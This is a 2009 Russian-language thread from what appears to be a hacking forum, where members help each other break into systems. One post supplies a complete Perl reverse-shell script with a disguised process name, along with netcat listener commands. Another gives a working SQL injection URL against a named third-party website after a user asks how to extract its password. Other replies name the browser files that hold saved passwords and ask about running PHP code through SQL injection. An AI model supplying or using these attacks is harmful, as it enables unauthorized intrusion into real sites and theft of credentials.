11.08.2009, 02:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Не, не надо, уже были преценденты, плохо кончалось. Лучше вот, пройди в тему автора и задай там свой вопрос:
https://forum.antichat.ru/thread103155.html
O_o
Последний раз редактировалось Pashkela; 11.08.2009 в 02:15..
|
|
|
11.08.2009, 07:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами:
9328706
Репутация:
1503
|
|
Почему на всех моих веб шеллах не открвается порт для конекта нетката?
И подскажите как юзать неткат в режиме backconnect через дедик
Лучше юзай просто бекконект? Например такой:
Код:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Еще у тебя на дедике должен быть так называемый "белый IP", далее ты запускаешь на сервере вышеприведенный скрипт, а на дедике nc.exe -l -v -p 443, еще может быть решением проблемы бекконект на 80 порт, либо 443.
А еще лучше под эти цели юзать не дедик, а vds например, конектишься по ссш, и там открываешь неткат ./nc -l -v -p 443
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
11.08.2009, 19:18
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами:
9018815
Репутация:
0
|
|
http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5
pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
|
|
|
|
11.08.2009, 19:27
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от borntobebad
http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5
pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
тут не блинд
Код:
http://caryscars.be/index.php?item=details&id=-150+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16--
|
|
|
|
11.08.2009, 19:50
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами:
9018815
Репутация:
0
|
|
a pochemu split4 ne naxodit pole vvoda ?
|
|
|
|
11.08.2009, 19:53
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами:
9018815
Репутация:
0
|
|
razobralsa . Split4 pashit .
|
|
|
|
11.08.2009, 21:54
|
|
Новичок
Регистрация: 06.07.2009
Сообщений: 4
С нами:
8867850
Репутация:
0
|
|
может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
|
|
|
|
11.08.2009, 23:15
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от noozike69
может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
Opera хранит пароли в wand.dat
Firefox - в файле signons3.txt , для расшифровки нужен файл key3.db. Оба файла находятся в профиле
Последний раз редактировалось z00MAN; 11.08.2009 в 23:23..
|
|
|
|
12.08.2009, 02:46
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами:
9078977
Репутация:
34
|
|
как через mysql inj выполнить php код,если могу добовлять записи в бд,но они фильтруются.добовляю <?system(ls);?>
вот что добовляется в бд <?system(ls);?>.
Ну и при выводе не выполняется.Можн какнить сделать?
|
|
|
|
11.08.2009, 22:00
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
в Mozilla formhistory.sqlite вроде как....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
